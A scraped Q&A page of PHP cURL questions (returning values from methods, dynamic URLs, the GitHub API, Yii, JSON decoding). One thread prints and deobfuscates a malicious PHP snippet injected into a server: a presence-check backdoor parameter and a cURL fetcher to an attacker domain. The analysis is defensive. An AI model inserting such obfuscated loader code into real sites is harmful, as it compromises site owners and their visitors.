Can't get data out of variable - php

I've made a curl request. I put the curl instructions in one class function:
class Curly {
var $data;
function GetRequest($url) {
$ch = curl_init();
$timeout = 5;
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$this->data = curl_exec($ch);
curl_close($ch);
//this is what i was missing --> return $this->data;
}
I put the database query in another class function.
include('class.curly.php');
class mongoSearchForInfoOnEsd {
public function getEsdsFbInfo($esdID) {
$mongoApiKey = "xx";
$requestParams= "xx";
$url = "xx";
$fbInfo = (new Curly)->GetRequest($url);
//this is what i was missing --> return $fbInfo;
}
In the index.php, an HTTP post from a webhook is coming through, in which parsing through some strings to obtain 2 ids is handled. I then send one of those ids to the mongodb curl request, everything goes good. The correct response comes back, I only know this b/c of the var_dump of the var_dump in the curly class....BUT in the index file I'm struggling to get to get the data out of the var and assign its values to any variable I want.
How can I get the data out? I know its there, but where?
I'm so stuck.
# get ytID from http post
#get EsdID from http post
$httpPostData = file_get_contents('php://input');
$postDataDecoded = urldecode($httpPostData);
$ytID = substr($postDataDecoded, strpos($postDataDecoded, "docid=") + strlen("docid="), );
$esdID = substr($postDataDecoded, strpos($postDataDecoded, "m\": \"") + strlen ("m\": "),;
*$esdData = (new mongoSearchForInfoOnEsd)->getEsdsFbInfo("$esdID");*
$obj = json_decode($esdData, true);
echo $obj;
OK, I've added return and I can see the data, but no operations are working on returned data.
edit ---> put return in both classes, now its fully operational.


As lazyhammer said you need to write the following in the end of your method GetRequest($url)
return $this->data;
Also, in a class, a function is called a method.
To be more explicit.
var_dump doesn't return the data. it's only sending them to the client(your browser) which will display it.
to return the data computed in your method back to the caller, you need to use the keyword return at the end of your method.
When your computer will see return he bring back the data to the caller. it means everything you write after return won't be executed.


Just because you are assigning a value to the class variable data doesn't mean that value is being returned when you call the function getRequest. Therefore, in order to use the data from an outside class, you need to return the final value:
function GetRequest($url){
$ch = curl_init();
$timeout = 5;
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$this->data = curl_exec($ch);
curl_close($ch);
return $this->data;
}
You may not even need to keep the variable $data around, unless there is more to your code that you are not showing, you could simply return curl_exec($ch)
To further answer your question from your comments below, this is from php.net:
This function displays structured information about one or more expressions that includes its type and value. Arrays and objects are explored recursively with values indented to show structure.
As you can see, var_dump is used for display purposes only.

Related

how to pass dynamic URL to curl in php - getting error 1

I'm trying to pass a $url to curl using a function.
the URL is built with a variable in it in the following method:
a.php // main page, include (a.php, b.php)
b.php // dynamic string function
c.php // curl function
I build a dynamic string successfully using sessions data // $_SESSION["input"]
myDynamicstringfunction set a string by multiple sessions input values.
$dval = myDynamicstringfunction();
echo $dval;
// render correctly to: "-e5 -g6 -g7"
the $dval value is a string that resolve as expected. the $url is:
$url = "https://someurl.com/a/b?dc=-cv1.5 -a1 -b2 -c3 -d4 $dval";
The $url is render correctly with the
echo $url;
$url = "https://someurl.com/a/b?dc=-cv1.5 -a1 -b2 -c3 -d4 -e5 -g6 -g7";
I pass the $url to the curl function using:
$r = mycUrlfunction($url);
The curl function I use:
function singleRequest($url){
$ch = curl_init();
// set URL and other appropriate options
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_HEADER, 0);
// grab URL and pass it to the browser
$curly = curl_exec($ch);
if ($curly == FALSE){
die("cURL Error: " . curl_error($ch));
}
$result = json_decode($curly, true);
// close cURL resource, and free up system resources
curl_close($ch);
echo '<pre>';
return ($result);
}
The above get me an error (curl 1) - CURLE_UNSUPPORTED_PROTOCOL (1)
I have tried many things to get the $url to work with no success.
if I set the $url value manually without the $dval variable like this:
$url = "https://someurl.com/a/b?dc=-cv1.5 -a1 -b2 -c3 -d4 -e5 -g6 -g7";
The code works just fine and I get the correct results from the API call.
I tried using different quotes, {}, [], encoding to ASCII, vprintf(), and other solutions with no success.

the problem was with constructing the dynamic variable $dynamicstring of the URL
initially used
$dynamicstring= "-a" . $_SESSION["a"]." -b".$_SESSION['b']." -c".$_SESSION['c']." -d".$_SESSION['d']."<br>";
this have a few problems
when using echo it render the expected output correctly
it have a "<br>" at the end
it have the wrong structure
the correct way to construct the $dynamicstring is to use {}
$dynamicstring= "-a{$_SESSION["a"]} -b{$_SESSION['b']} -c{$_SESSION['c']} -d{$_SESSION['d']}";

How to deobfuscate a PHP code that is written as below? [closed]

Closed. This question needs to be more focused. It is not currently accepting answers.
Want to improve this question? Update the question so it focuses on one problem only by editing this post.
Closed 1 year ago.
Improve this question
I have seen this code added to the server file. It looks like it is a malicious code, I can't seem a way to deobfuscate/decrypt this code.
<?php
#header('Content-Type:text/html;charset=utf-8');
error_reporting(0); $OOOOOO="%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c";
global $O;
$O=urldecode($OOOOOO);
if($_GET[$O{21}.$O{15}.$O{2}.$O{24}]==$O{69}.$O{64}.$O{53}.$O{21}.$O{24}){
$oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
$oooOoOoOoOoooooOOooo = explode($O{58}.$O{55}.$O{9}.$O{15}.$O{9},$oooOoOoOoooOooOOooooo);
if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){
echo $O{81}.$O{8}.$O{17}.$O{88}.$O{82};
exit;
}else{
echo $O{81}.$O{13}.$O{10}.$O{7}.$O{18}.$O{88}.$O{82};
exit;
}
}
$oOooOO='z0807_1';
$oOooOOoO=$O{15}.$O{4}.$O{4}.$O{9}.$O{62}.$O{63}.$O{63}.$oOooOO.$O{59}.$O{10}.$O{14}.$O{8}.$O{8}.$O{12}.$O{11}.$O{59}.$O{4}.$O{8}.$O{9};
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
$ooooOOOooOo=curl_init();
curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);
curl_close($ooooOOOooOo);
return $oooooOOOOooO;
}

You can unravel this step by step.
There is this $OOOOOO string which then URL-decoded into $O, which yields the following (which looks like going through the keyboard row by row):
$O = "qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-\"?> <.-=:/1230654879';()&^$[]\\%{}!*|+,";
From then on, in many places characters of this string are accessed (using the lesser-known and by now also deprecated braces syntax for array index access) and used to build new strings. We can replace all these $O{x} bits with the actual characters (I used a regex replace):
if($_GET["c"."h"."e"."n"]=="5"."1"."-"."c"."n"){
$oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
$oooOoOoOoOoooooOOooo = explode("<"."?"."p"."h"."p",$oooOoOoOoooOooOOooooo);
if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){
echo "["."o"."k"."!"."]";
exit;
}else{
echo "["."f"."a"."i"."l"."!"."]";
exit;
}
}
$oOooOO='z0807_1';
$oOooOOoO="h"."t"."t"."p".":"."/"."/".$oOooOO."."."a"."g"."o"."o"."d"."s"."."."t"."o"."p";
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
$ooooOOOooOo=curl_init();
curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);
curl_close($ooooOOOooOo);
return $oooooOOOOooO;
}
We can then combine those strings to make them more readable:
if($_GET["chen"]=="51-cn"){
$oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
$oooOoOoOoOoooooOOooo = explode("<?php",$oooOoOoOoooOooOOooooo);
if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){
echo "[ok!]";
exit;
}else{
echo "[fail!]";
exit;
}
}
$oOooOO='z0807_1';
$oOooOOoO="http://".$oOooOO.".agoods.top";
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
$ooooOOOooOo=curl_init();
curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);$oooooOOOOooO = curl_exec($ooooOOOooOo);
curl_close($ooooOOOooOo);
return $oooooOOOOooO;
}
Now let's rename the confusing variables:
if($_GET["chen"]=="51-cn"){
$varA = file_get_contents(__FILE__);
$varB = explode("<?php",$varA);
if(strpos($varB[1],'%71%77%65')!==false){
echo "[ok!]";
exit;
}else{
echo "[fail!]";
exit;
}
}
$varC='z0807_1';
$varD="http://".$varC.".agoods.top";
function someFunction($varE){
$varF=curl_init();
curl_setopt ($varF, CURLOPT_URL, $varE);curl_setopt ($varF, CURLOPT_RETURNTRANSFER, 1);curl_setopt ($varF, CURLOPT_CONNECTTIMEOUT, 5);$varG = curl_exec($varF);
curl_close($varF);
return $varG;
}
Next, let's split up the long line inside of the function:
if($_GET["chen"]=="51-cn"){
$varA = file_get_contents(__FILE__);
$varB = explode("<?php",$varA);
if(strpos($varB[1],'%71%77%65')!==false){
echo "[ok!]";
exit;
}else{
echo "[fail!]";
exit;
}
}
$varC='z0807_1';
$varD="http://".$varC.".agoods.top";
function someFunction($varE){
$varF=curl_init();
curl_setopt ($varF, CURLOPT_URL, $varE);
curl_setopt ($varF, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($varF, CURLOPT_CONNECTTIMEOUT, 5);
$varG = curl_exec($varF);
curl_close($varF);
return $varG;
}
As a final step, we can guess better names for those variables:
if($_GET["chen"]=="51-cn"){
$thisFileSource = file_get_contents(__FILE__);
$parts = explode("<?php",$thisFileSource);
if(strpos($parts[1],'%71%77%65')!==false){
echo "[ok!]";
exit;
}else{
echo "[fail!]";
exit;
}
}
$subdomain='z0807_1';
$url="http://".$subdomain.".agoods.top";
function sendRequest($url){
$curl=curl_init();
curl_setopt ($curl, CURLOPT_URL, $url);
curl_setopt ($curl, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($curl, CURLOPT_CONNECTTIMEOUT, 5);
$result = curl_exec($curl);
curl_close($curl);
return $result;
}
As for what this code does: If this is called with query parameter chen=51-cn in the URL, it checks if the current file contains the start of that $OOOOOO string in the first PHP code section, and if it does, it returns [ok!], otherwise [fail!]. (This sounds entirely useless to me, because if the code wouldn't exist, then it wouldn't run either, so just echo "[ok!]"; would have sufficed...) Additionally, it prepares a request to http://z0807_1.agoods.top but it's never executed, at least not in the piece of code that you showed. (Maybe it's executed elsewhere in your code at some other place where code got injected too! Could be worth looking for ooooooooOOOOOOOOoooooOOO.)
Googling for "agoods.top" reveals a lot of seemingly unrelated sites that include in their contents what appears to be various PHP errors like Warning: mysqli::__construct(): (HY000/1040): Too many connections in /www/wwwroot/z0930_1.agoods.top/connect2.php on line 7. (How ironic, given that in the injected code, error output is suppressed.) Browsing these sites (which I did with a lot of care, so you don't have to!) shows that some of them act maliciously, for example redirecting the user to a fake "browser update" page after a few seconds, and many are just down by now. This makes me believe that those are also hijacked sites, and that the code was supposed to eventually pull HTML from the attacker's sites on zXXXX_X.agoods.top and inject it into the page, but the attacker messed up and also delivered PHP errors that way which ended up in Google's cache.

Because i always wonder what to expect if this would happen to me
i looked up what this code does.
First the commented code, and below the comments only.
DO NOT execute this on your machine!
// Sets header ...
#header('Content-Type:text/html;charset=utf-8');
// Disables error reporting (sure to not trigger notifications on owner side).
error_reporting(0);
// Sets a char string: qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-"?\> <.-=:/1230654879';()&^$[]\\%{}!*|+,
// ^ escaped by me
$OOOOOO="%71%77%65%72%74%79%75%69%6f%70%61%73%64%66%67%68%6a%6b%6c%7a%78%63%76%62%6e%6d%51%57%45%52%54%59%55%49%4f%50%41%53%44%46%47%48%4a%4b%4c%5a%58%43%56%42%4e%4d%5f%2d%22%3f%3e%20%3c%2e%2d%3d%3a%2f%31%32%33%30%36%35%34%38%37%39%27%3b%28%29%26%5e%24%5b%5d%5c%5c%25%7b%7d%21%2a%7c%2b%2c";
// Sets $O global (makes no sense to me).
global $O;
// decodes the url encoded string "qwertyuiopasdf...".
$O=urldecode($OOOOOO);
// $_GET['chen'] == '51-cn'
if($_GET[$O{21}.$O{15}.$O{2}.$O{24}]==$O{69}.$O{64}.$O{53}.$O{21}.$O{24}){
// Load this file into var.
$oooOoOoOoooOooOOooooo = file_get_contents(__FILE__);
// Explode by "<?php" (makes no sense to me).
$oooOoOoOoOoooooOOooo = explode($O{58}.$O{55}.$O{9}.$O{15}.$O{9},$oooOoOoOoooOooOOooooo);
// If "%71%77%65" is found in loaded file (part) (so if we loaded the "hacked" file)
if(strpos($oooOoOoOoOoooooOOooo[1],'%71%77%65')!==false){
// then echo "[ok!]" and exit
echo $O{81}.$O{8}.$O{17}.$O{88}.$O{82};
exit;
}else{
// else echo "[fail!]" and exit
echo $O{81}.$O{13}.$O{10}.$O{7}.$O{18}.$O{88}.$O{82};
exit;
}
}
// Following function got not called by provided code.
// I think its to load more code into the project.
// (I disabled the curl lines btw.)
// Set sub domain on var.
$oOooOO='z0807_1';
// Set url "http://z0807_1.agoods.top" on var.
$oOooOOoO=$O{15}.$O{4}.$O{4}.$O{9}.$O{62}.$O{63}.$O{63}.$oOooOO.$O{59}.$O{10}.$O{14}.$O{8}.$O{8}.$O{12}.$O{11}.$O{59}.$O{4}.$O{8}.$O{9};
function ooooooooOOOOOOOOoooooOOO($oooOOOoOoo){
// Init curl.
#$ooooOOOooOo=curl_init();
// Set url (given function param).
#curl_setopt ($ooooOOOooOo, CURLOPT_URL, $oooOOOoOoo);
// CURLOPT_RETURNTRANSFER = 1 to not echo out response.
#curl_setopt ($ooooOOOooOo, CURLOPT_RETURNTRANSFER, 1);
// 5 sec connection timeout.
#curl_setopt ($ooooOOOooOo, CURLOPT_CONNECTTIMEOUT, 5);
// Execute and set response to NEW var.
#$oooooOOOOooO = curl_exec($ooooOOOooOo);
#curl_close($ooooOOOooOo);
// Return new var content.
#return $oooooOOOOooO;
}
Here the "just comments" part.
// Sets header ...
// Disables error reporting (sure to not trigger notifications on owner side).
// Sets a char string: qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM_-"?\> <.-=:/1230654879';()&^$[]\\%{}!*|+,
// Sets $O global (makes no sense to me).
// decodes the url encoded string "qwertyuiopasdf...".
// $_GET['chen'] == '51-cn'
// Load this file into var.
// Explode by "<?php" (makes no sense to me).
// If "%71%77%65" is found in loaded file (part) (so if we loaded the "hacked" file)
// then echo "[ok!]" and exit
// else echo "[fail!]" and exit
// Following function got not called by provided code.
// I think its to load more code into the project.
// (I disabled the curl lines btw.)
// Set sub domain on var.
// Set url "http://z0807_1.agoods.top" on var.
// Init curl.
// Set url (given function param).
// CURLOPT_RETURNTRANSFER = 1 to not echo out response.
// 5 sec connection timeout.
// Execute and set response to NEW var.
// Return new var content.
So this looks to me like
not the complete code that got injected
done by a bot that checks if the injection was successfully
a script to load more bad code into your project on deamand.
Lets hope you just got "marked" somewhere as "found" - so nothing really happened yet.
But i dont know that.

Retrieve all languages used by a Github user

In my script I have a function that retrieves JSON information from the Github API, https://api.github.com/users/octocat/repos.
I want to have a different function to get all the languages used by (in this case) octocat and then count how many times he used the language.
I was thinking of this:
foreach($json['language'] as $RepoLanguage)
{
echo $RepoLanguage;
}
but that won't work, any suggestions/ideas?

I think the main reason is that you did not specify the User Agent as specified here: https://developer.github.com/v3/#user-agent-required
Did you check what result you have in the $json?
Here's a working example.
<?php
function get_content_from_github($url) {
$ch = curl_init();
curl_setopt($ch,CURLOPT_URL,$url);
curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,1);
curl_setopt($ch,CURLOPT_USERAGENT,'My User Agent');
$content = curl_exec($ch);
curl_close($ch);
return $content;
}
$json = json_decode(get_content_from_github('https://api.github.com/users/octocat/repos'), true);
foreach($json as $repo) {
$language = $repo['language'];
}
?>

curl is not working in Yii

when i am using curl in my core php file it's working fine for me and getting expected result also... my core php code is...
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL, "http://stage.auth.stunnerweb.com/index.php?r=site/getUser");
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
$data = curl_exec($curl);
echo $data; //here i am getting respond proper
here in above i am making call to getUser function and i am getting respond from that function...
but now my problem is when i am using this same code in my any Yii controller (tried to use it in SiteController & Controller) but it's not working...
public function beforeAction()
{
if(!Yii::app()->user->isGuest)
{
$curl = curl_init();
curl_setopt($curl, CURLOPT_URL ,"http://stage.auth.stunnerweb.com/index.php?r=site/kalpit");
curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
$data = curl_exec($curl);
echo $data;
}
else
return true;
}
in yii can't we use curl like this?
Can you please suggest me how to use curl in yii?
Thanks in advance

Better use yii-curl
Setup instructions
Place Curl.php into protected/extensions folder of your project
in main.php, add the following to 'components':
php
'curl' => array(
'class' => 'ext.Curl',
'options' => array(/.. additional curl options ../)
);
Usage
to GET a page with default params
php
$output = Yii::app()->curl->get($url, $params);
// output will contain the result of the query
// $params - query that'll be appended to the url
to POST data to a page
php
$output = Yii::app()->curl->post($url, $data);
// $data - data that will be POSTed
to PUT data
php
$output = Yii::app()->curl->put($url, $data, $params);
// $data - data that will be sent in the body of the PUT
to set options before GET or POST or PUT
php
$output = Yii::app()->curl->setOption($name, $value)->get($url, $params);
// $name & $value - CURL options
$output = Yii::app()->curl->setOptions(array($name => $value))->get($get, $params);
// pass key value pairs containing the CURL options

You are running your code inside a beforeAction() method which is not supposed to render any data at all. On top of that, you do not let the method return anything if the current user is a guest. Please read the API docs concerning this.

Decoding JSON after sending using PHP cUrl

I've researched everywhere and cannot figure this out.
I am writing a test cUrl request to test my REST service:
// initialize curl handler
$ch = curl_init();
$data = array(
"products" => array ("product1"=>"abc","product2"=>"pass"));
$data = json_encode($data);
$postArgs = 'order=new&data=' . $data;
// set curl options
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLINFO_HEADER_OUT, TRUE);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_POSTFIELDS, $postArgs);
curl_setopt($ch, CURLOPT_URL, 'http://localhost/store/rest.php');
// execute curl
curl_exec($ch);
This works fine and the request is accepted by my service and $_Post is populated as required, with two variables, order and data. Data has the encoded JSON object. And when I print out $_Post['data'] it shows:
{"products":{"product1":"abc","product2":"pass"}}
Which is exactly what is expected and identical to what was sent in.
When I try to decode this, json_decode() returns nothing!
If I create a new string and manually type that string, json_decode() works fine!
I've tried:
strip_tags() to remove any tags that might have been added in the http post
utf8_encode() to encode the string to the required utf 8
addslashes() to add slashes before the quotes
Nothing works.
Any ideas why json_decode() is not working after a string is received from an http post message?
Below is the relevant part of my processing of the request for reference:
public static function processRequest($requestArrays) {
// get our verb
$request_method = strtolower($requestArrays->server['REQUEST_METHOD']);
$return_obj = new RestRequest();
// we'll store our data here
$data = array();
switch ($request_method) {
case 'post':
$data = $requestArrays->post;
break;
}
// store the method
$return_obj->setMethod($request_method);
// set the raw data, so we can access it if needed (there may be
// other pieces to your requests)
$return_obj->setRequestVars($data);
if (isset($data['data'])) {
// translate the JSON to an Object for use however you want
//$decoded = json_decode(addslashes(utf8_encode($data['data'])));
//print_r(addslashes($data['data']));
//print_r($decoded);
$return_obj->setData(json_decode($data['data']));
}
return $return_obj;
}

Turns out that when JSON is sent by cURL inside the post parameters & quot; replaces the "as part of the message encoding. I'm not sure why the preg_replace() function I tried didn't work, but using html_entity_decode() removed the &quot and made the JSON decode-able.

old:
$return_obj->setData(json_decode($data['data']));
new:
$data = json_decode( urldecode( $data['data'] ), true );
$return_obj->setData($data);
try it im curious if it works.

Categories